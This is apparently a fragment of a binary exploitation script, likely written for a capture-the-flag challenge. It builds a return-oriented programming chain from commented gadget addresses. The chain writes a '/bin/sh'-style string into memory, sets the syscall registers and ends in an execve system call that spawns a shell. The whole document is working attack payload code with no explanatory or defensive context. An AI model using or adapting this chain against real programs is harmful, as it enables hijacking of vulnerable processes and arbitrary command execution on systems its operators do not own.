payload = p64(0x4c6bb4)
#0x4c6bb4: pop rbx ; retf
payload += p64(0x7b3eeff4)+p32(0x49baa5)+p32(0x33)
# 0x000000000049baa5: pop rax; ret; 
payload += p64(0x41f243f3)+p64(0x45a0ce)
# 0x000000000045a0ce: or dword ptr [rbx - 0x7af0fe05], eax; ret; 
payload += p64(0x4c6bb4)
# 0x4c6bb4: pop rbx ; retf
payload += p64(0x7b3eee75)+p32(0x49baa5)+p32(0x33)
# 0x000000000049baa5: pop rax; ret; 
payload += p64(0x6e69622f)+p64(0x45a0ce)
# 0x000000000045a0ce: or dword ptr [rbx - 0x7af0fe05], eax; ret; 
payload += p64(0x4c6bb4)
# 0x4c6bb4: pop rbx ; retf
payload += p64(0x7b3eee79)+p32(0x49baa5)+p32(0x33)
# 0x000000000049baa5: pop rax; ret; 
payload += p64(0x68662f)+p64(0x45a0ce)
# 0x000000000045a0ce: or dword ptr [rbx - 0x7af0fe05], eax; ret; 
payload += p64(0x4275b1)
# 0x00000000004275b1: mov edx, 0xbe0dbc0d; or eax, 0xdc20dbb; ret; 
payload += p64(0x49baa5)
# 0x000000000049baa5: pop rax; ret; 
payload += p64(0x36bdf004)+p64(0x401553)
# 0x0000000000401553: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x4df070)+p64(0x47f954)
# 0x000000000047f954: pop rsi; ret; 
payload += p64(0x0)+p64(0x49baa5)
# 0x000000000049baa5: pop rax; ret; 
payload += p64(0x3b)+p64(0x41da43)
# 0x000000000041da43: syscall; 
payload += b''
